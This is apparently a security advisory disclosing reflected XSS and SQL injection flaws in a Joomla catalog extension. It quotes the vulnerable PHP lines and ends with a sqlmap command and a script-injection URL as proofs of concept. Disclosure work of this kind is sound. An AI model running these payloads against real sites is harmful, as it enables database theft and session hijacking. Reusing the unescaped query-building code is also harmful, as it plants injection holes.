Title:SQLi and XSS in Huge IT catalog extension v1.0.4 for Joomla
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability.

Reflected XSS in file ./views/submissions/tmpl/default.php via message_id parameter:

825:   


SQL Injection 

in file ./models/submissions.php via id parameter
59-        $query = $db->getQuery(true);
60-        $id = JRequest::getVar('message_id');
61-        $this-> updateReadInfo($id);
62:        $query->select('*,#__huge_it_catalog_products.name as product_name, #__huge_it_catalog_asc_seller.id as  message_id');
63-        $query->from('#__huge_it_catalog_asc_seller,#__huge_it_catalog_products');
64-        $query->where('#__huge_it_catalog_asc_seller.product_id = #__huge_it_catalog_products.id and #__huge_it_catalog_asc_seller.id = "'.$id.'"');
65-        $db->setQuery($query);
in file ./models/comment.php via projectId parameter:

56-        $db = JFactory::getDBO();
57-       $id = JRequest::getVar('projectId'); 
58-       $query = $db->getQuery(true);
59:        $query->select('*,#__huge_it_catalog_reviews.id as comId, #__huge_it_catalog_reviews.name as author_name, #__huge_it_catalog_products.name as product_name')
60-             ->from('#__huge_it_catalog_reviews, #__huge_it_catalog_products')
61-         ->where('#__huge_it_catalog_reviews.product_id = #__huge_it_catalog_products.id and #__huge_it_catalog_products.id = "'.$id.'"');
62-        $db->setQuery($query);

in file ./models/rating.php via projectId parameter:

55-        return $results;
56-    } 
57-    
58-    public  function getRatingById() {
59-        $db = JFactory::getDBO();
60:       $id = JRequest::getVar('projectId'); 
61-       $query = $db->getQuery(true);
62-        $query->select('*,#__huge_it_catalog_rating.id as ratId')
63-             ->from('#__huge_it_catalog_rating, #__huge_it_catalog_products')
64-         ->where('#__huge_it_catalog_rating.prod_id = #__huge_it_catalog_products.id and #__huge_it_catalog_products.id = "'.$id.'"');
65-        $db->setQuery($query);

in file ./models/catalog.php via id parameter:

45:        $id_cat = JRequest::getVar('id');
46-        $query = $db->getQuery(true);
47-        $query->select('#__huge_it_catalog_products.name as name,'
48-                . '#__huge_it_catalog_products.id ,'
49-                . '#__huge_it_catalogs.name as catName,'
50-                . 'catalog_id,#__huge_it_catalog_products.description as productDescription,#__huge_it_catalog_products.parameters as productParameters,#__huge_it_catalogs.description,image_url,sl_url,sl_type,price,market_price,single_product_url_type,single_product_url_type,#__huge_it_catalog_products.link_target as productLinkTarget,#__huge_it_catalog_products.ordering,#__huge_it_catalog_products.published,published_in_sl_width');
51-        $query->from(array('#__huge_it_catalogs' => '#__huge_it_catalogs', '#__huge_it_catalog_products' => '#__huge_it_catalog_products'));
52-        $query->where('#__huge_it_catalogs.id = catalog_id')->where('catalog_id=' . $id_cat);
53-        $query->order('ordering asc');
54-       
55-        $db->setQuery($query);
--
63:        $id_cat = JRequest::getVar('id');
64-        $query = $db->getQuery(true);
65-        $query->select('*');
66-        $query->from('#__huge_it_catalog_products');
67-        $query->where('catalog_id=' . $id_cat);
68-        $db->setQuery($query);
69-        $results = $db->loadObjectList();
70-        return $results;
71-    }
72-
73-    public function save($data) {
--
121:        $id_cat = JRequest::getVar('id');
122-        $query = $db->getQuery(true);
123-        $query->update('#__huge_it_catalogs')->set('name ="' . $name . '"')->where('id="' . $id_cat . '"');
124-        $db->setQuery($query);
125-        $db->execute();
126-    }
127-
128-    function selectStyle() {
129-        $db = JFactory::getDBO();
130-        $data = JRequest::get('post');
131-          $name = $data['name'];
--
136:        $id_cat = JRequest::getVar('id');
137-        $query = $db->getQuery(true);
138-        
139-        $query->update('#__huge_it_catalogs')
140-              ->set('name ="' . $name . '"')
141-              ->set('catalog_list_effects_s ="'.$catalog_effects_list.'"')
142-              ->set('pagination_type ="'.$pagination_type.'"')
143-              ->set('count_into_page ="'.$count_into_page.'"')
144-              ->set('categories ="'.$allCategories.'"')
145-              ->where('id="' . $id_cat . '"');
146-        $db->setQuery($query);
--

via removeslide parameter:

208:        $id_cat = JRequest::getVar('removeslide');
209:        $id = JRequest::getVar('id');
210-        $db = JFactory::getDBO();
211-        $query = $db->getQuery(true);
212-        $query->delete('#__huge_it_catalog_products')->where('id =' . $id_cat);
213-        $db->setQuery($query);
214-        $db->execute();
SQLi:
 
$ sqlmap  --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=*" --dbms mysql 
 
XSS:
 
http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E